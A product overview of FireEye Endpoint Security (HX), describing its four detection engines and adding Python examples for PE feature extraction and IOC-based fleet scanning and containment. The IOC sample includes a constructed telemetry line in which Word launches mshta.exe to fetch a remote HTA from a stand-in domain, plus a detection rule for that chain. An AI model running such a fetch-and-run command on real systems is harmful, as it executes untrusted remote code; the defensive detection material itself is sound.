What is FireEye Endpoint Security (HX)?
FireEye Endpoint Security (HX) is an endpoint security solution that combines conventional antivirus (EPP), next-generation antivirus (NGAV), and EDR. For layered protection of endpoints, the solution is equipped with four engines in total: a conventional signature-based antivirus engine, a machine learning (AI) engine, a behavior detection engine, and an indicator of compromise (IOC) engine. Because the agent runs in kernel mode, it can observe system activity directly, which lets it judge malicious behavior accurately and collect detailed activity logs.
Features
◆ Equipped with four different engines, providing multi-layered detection and protection against attacks
- Detects known threats based on signatures (Malware Protection)
- Uses machine learning to detect unknown threats and advanced attacks (Malware Guard)
- Uses behavior detection to detect exploits against applications and browsers (Exploit Guard)
- Uses FireEye Threat Intelligence for detection (Real-time Indicator)
◆ Intuitive interface that is easy to understand and easy to use
The service addresses needs such as the following:
- Want to keep endpoints constantly protected with the latest security against threats
- Want to introduce security that can handle unknown threats
- Want security that can still respond when a malware-infected file is accessed
Main Functions
Malware protection: conventional antivirus
Real-time scan
- Scan file at time of access
- Scan network files (can be enabled or disabled)
Scheduled scan
- Daily / Weekly / Monthly / When updating virus definition / When launching the system
- Scan level: Full disk, Quick scan, Active memory
Quarantine
- Detected files are encrypted and quarantined on the endpoint for 90 days by default (configurable from 1 day to 365 days)
- Restore / delete
- Download to the Endpoint Security Server
Others
- Skip scanning for Windows OS files and duplicate files
- Support for Windows early launch anti-malware driver (ELAM)
Malware Guard: machine learning (AI) for protection against unknown malware
◆ Collects hundreds of millions of executable files (.exe, .dll, .sys, etc.)
◆ Collects the latest unknown malware from FireEye products and services
◆ Extracts over 2,000 static features from each file for training, for example:
- Byte entropy (degree of randomness of the file's bytes)
- File header fields
- Address tables, etc.
◆ Training data is manually reviewed and corrected
◆ Training data is transmitted encrypted
◆ Can run alongside antivirus from other vendors
◆ Supports a configuration that does not send user data outside the organization (1Way)
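As an added example (this is not FireEye's code and not Malware Guard's actual feature set), the following Python extracts three of the static feature classes listed above from a PE image: overall and per-section byte entropy, file header fields, and the import table (the DLLs the file links against). The sample PE is constructed inline so the script runs offline; the field offsets follow the published PE/COFF layout, but the choice of features and all names are this example's own.

```python
# Added example, not FireEye code: extracts a few static features of the kind
# listed above (byte entropy, header fields, address tables) from a PE image.
# The sample PE is constructed inline; no real binary is read.
import math
import struct
from collections import Counter


def build_sample_pe() -> bytes:
    """Constructed input: a minimal PE32 with one .text section and two imports."""
    hdr = bytearray(0x200)                              # headers, padded to FileAlignment
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)             # e_lfanew -> PE signature at 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    # COFF header: i386, 1 section, 224-byte optional header, EXECUTABLE_IMAGE | 32BIT_MACHINE
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 1, 0, 0, 0, 224, 0x0102)
    opt = 0x58                                          # optional header start
    struct.pack_into("<H", hdr, opt, 0x10B)             # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0x1000)       # AddressOfEntryPoint
    struct.pack_into("<I", hdr, opt + 28, 0x400000)     # ImageBase
    struct.pack_into("<II", hdr, opt + 32, 0x1000, 0x200)   # SectionAlignment, FileAlignment
    struct.pack_into("<II", hdr, opt + 56, 0x2000, 0x200)   # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", hdr, opt + 92, 16)           # NumberOfRvaAndSizes
    struct.pack_into("<II", hdr, opt + 96 + 8, 0x1040, 0x3C)  # data directory[1] = imports
    sec = opt + 224                                     # first IMAGE_SECTION_HEADER
    struct.pack_into("<8sIIII", hdr, sec, b".text", 0x200, 0x1000, 0x200, 0x200)
    struct.pack_into("<I", hdr, sec + 36, 0x60000020)   # CODE | EXECUTE | READ
    text = bytearray(0x200)                             # raw .text data, mapped at RVA 0x1000
    text[0:5] = b"\x55\x8b\xec\x33\xc0"                 # push ebp; mov ebp,esp; xor eax,eax
    # two IMAGE_IMPORT_DESCRIPTORs at RVA 0x1040, followed by an all-zero terminator
    struct.pack_into("<IIIII", text, 0x40, 0, 0, 0, 0x1080, 0x1090)
    struct.pack_into("<IIIII", text, 0x54, 0, 0, 0, 0x10A0, 0x10B0)
    text[0x80:0x8D] = b"KERNEL32.dll\0"
    text[0xA0:0xAB] = b"WS2_32.dll\0"
    return bytes(hdr + text)


def byte_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 to 8.0): packed or encrypted
    payloads sit near 8, ordinary code and data well below."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def rva_to_offset(rva: int, sections: list) -> int:
    """Map a relative virtual address to a file offset via the section table."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return rva - s["va"] + s["raw_ptr"]
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def imported_dlls(data: bytes, import_rva: int, sections: list) -> list:
    """Walk the import directory: one 20-byte IMAGE_IMPORT_DESCRIPTOR per DLL."""
    names, off = [], rva_to_offset(import_rva, sections)
    while True:
        _oft, _ts, _fwd, name_rva, first_thunk = struct.unpack_from("<IIIII", data, off)
        if name_rva == 0 and first_thunk == 0:          # all-zero entry ends the list
            break
        start = rva_to_offset(name_rva, sections)
        names.append(data[start:data.index(b"\0", start)].decode("ascii"))
        off += 20
    return names


def extract_features(data: bytes) -> dict:
    """Static features a classifier could consume; ValueError if not a PE32/PE32+."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, ts, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    plus = magic == 0x20B                               # PE32+ shifts the 64-bit fields
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<Q" if plus else "<I", data, opt + (24 if plus else 28))[0]
    ndirs = struct.unpack_from("<I", data, opt + (108 if plus else 92))[0]
    dirs = opt + (112 if plus else 96)
    sections = []
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va,
                         "vsize": vsize, "raw_size": raw_size, "raw_ptr": raw_ptr,
                         "entropy": byte_entropy(data[raw_ptr:raw_ptr + raw_size])})
    imports = []
    if ndirs > 1:
        import_rva, _size = struct.unpack_from("<II", data, dirs + 8)
        if import_rva:
            imports = imported_dlls(data, import_rva, sections)
    return {"file_entropy": byte_entropy(data), "machine": machine, "timestamp": ts,
            "characteristics": chars, "entry_point": entry, "image_base": image_base,
            "sections": sections, "imports": imports}
```

Running `extract_features(build_sample_pe())` yields a low file entropy (the sample is mostly zero padding), one `.text` section, and the imports `KERNEL32.dll` and `WS2_32.dll`; feeding it a packed or encrypted blob pushes the entropy toward 8 bits per byte, which is the kind of signal a static classifier keys on. The parser deliberately raises on anything that is not a PE rather than guessing, since a feature extractor that silently returns zeros for malformed input is easy to evade.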
Exploit Guard: Detects and blocks exploits used in the early stages of intrusion
Examples of exploit techniques that can be detected
- Memory corruption (buffer overflow, ROP, etc.)
- Heap spray
- MS Office macros
- Embedded binary launch
- Java sandbox bypass
- Kernel exploits
Supported applications
- Browsers: Internet Explorer, Firefox, Chrome
- Browser plug-ins
- Adobe Acrobat, Flash
- MS Office: Word, Excel, PowerPoint
- WordPad
- Java applet runtime
Real-time Indicator: distributes IOCs to all endpoints in order to detect and block attacks in real time
- IOCs are generated from actual intrusion activity
- The generated IOCs are distributed to all endpoints
- Once every endpoint that matches the IOC has been isolated (contained), the incident can be declared closed
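To make that workflow concrete, here is an added example (an illustration, not HX's code and not its IOC schema) of the three steps above: an IOC written as a small and/or expression tree, evaluated against constructed per-endpoint telemetry, with the matching hosts turned into a containment plan. Every field name, hostname, hash and event below is invented for this example.

```python
# Added example, not FireEye code: an IOC (expressed as a small and/or expression
# tree) is evaluated against each endpoint's telemetry and matching hosts are
# queued for containment. IOC schema, field names, hosts and events are invented.
import hashlib

# Constructed "known dropper" hash so the sample does not hard-code a real one.
DROPPER_SHA256 = hashlib.sha256(b"constructed dropper sample").hexdigest()

# Constructed IOC from a hypothetical intrusion: Word spawning mshta.exe to fetch
# a remote HTA, the dropped file's hash, or traffic to the attacker's domain.
SAMPLE_IOC = {
    "id": "ioc-0001",
    "name": "Office macro dropper (constructed example)",
    "op": "or",
    "terms": [
        {"field": "file.sha256", "match": "is", "value": DROPPER_SHA256},
        {"op": "and", "terms": [
            {"field": "process.parent_name", "match": "is", "value": "WINWORD.EXE"},
            {"field": "process.name", "match": "is", "value": "mshta.exe"},
            {"field": "process.cmdline", "match": "contains", "value": "http"},
        ]},
        {"field": "network.dst_host", "match": "endswith", "value": ".example.invalid"},
    ],
}

# Constructed telemetry: one list of flat key/value events per endpoint.
SAMPLE_TELEMETRY = {
    "ws-0042": [
        {"type": "process", "process.parent_name": "winword.exe", "process.name": "MSHTA.EXE",
         "process.cmdline": "mshta.exe http://cdn.example.invalid/invoice.hta"},
        {"type": "network", "network.dst_host": "cdn.example.invalid", "network.dst_port": 80},
    ],
    "ws-0043": [  # mshta.exe from Explorer with a local HTA: not the observed chain
        {"type": "process", "process.parent_name": "explorer.exe", "process.name": "mshta.exe",
         "process.cmdline": "mshta.exe C:\\Tools\\local.hta"},
    ],
    "srv-0007": [
        {"type": "file", "file.path": "C:\\Users\\Public\\update.exe", "file.sha256": DROPPER_SHA256},
    ],
}


def _norm(value):
    """Case-fold strings so hashes, hostnames and process names compare reliably."""
    return value.lower() if isinstance(value, str) else value


def evaluate(node: dict, event: dict) -> bool:
    """Evaluate an IOC node against one event. A term whose field the event
    lacks is false, so an IOC never matches on missing data."""
    if "op" in node:
        results = (evaluate(child, event) for child in node["terms"])
        return all(results) if node["op"] == "and" else any(results)
    actual, expected = _norm(event.get(node["field"])), _norm(node["value"])
    if actual is None:
        return False
    if not isinstance(actual, str):                 # numeric fields: equality only
        return actual == expected
    if node["match"] == "is":
        return actual == expected
    if node["match"] == "contains":
        return expected in actual
    if node["match"] == "endswith":
        return actual.endswith(expected)
    raise ValueError(f"unknown match type {node['match']!r}")


def scan_fleet(ioc: dict, telemetry: dict) -> dict:
    """Run one IOC over every endpoint; returns {host: [matching events]}."""
    hits = {}
    for host, events in telemetry.items():
        matched = [e for e in events if evaluate(ioc, e)]
        if matched:
            hits[host] = matched
    return hits


def containment_plan(ioc: dict, hits: dict, exempt=()) -> list:
    """Every matching host is isolated, except hosts on the exemption list
    (e.g. a domain controller), which raise an alert for a human instead."""
    return [{"host": host,
             "action": "alert" if host in exempt else "contain",
             "ioc": ioc["id"], "events": len(hits[host])}
            for host in sorted(hits)]
```

With the constructed data, `scan_fleet` flags ws-0042 (the Word-to-mshta chain and the matching outbound connection) and srv-0007 (the dropper hash), while ws-0043 is left alone because its mshta.exe was launched from Explorer with a local file. The exemption list in `containment_plan` is there because automatically isolating every match is how an IOC sweep takes down a domain controller or a file server; hosts whose isolation would cause an outage should alert a human rather than be contained unattended.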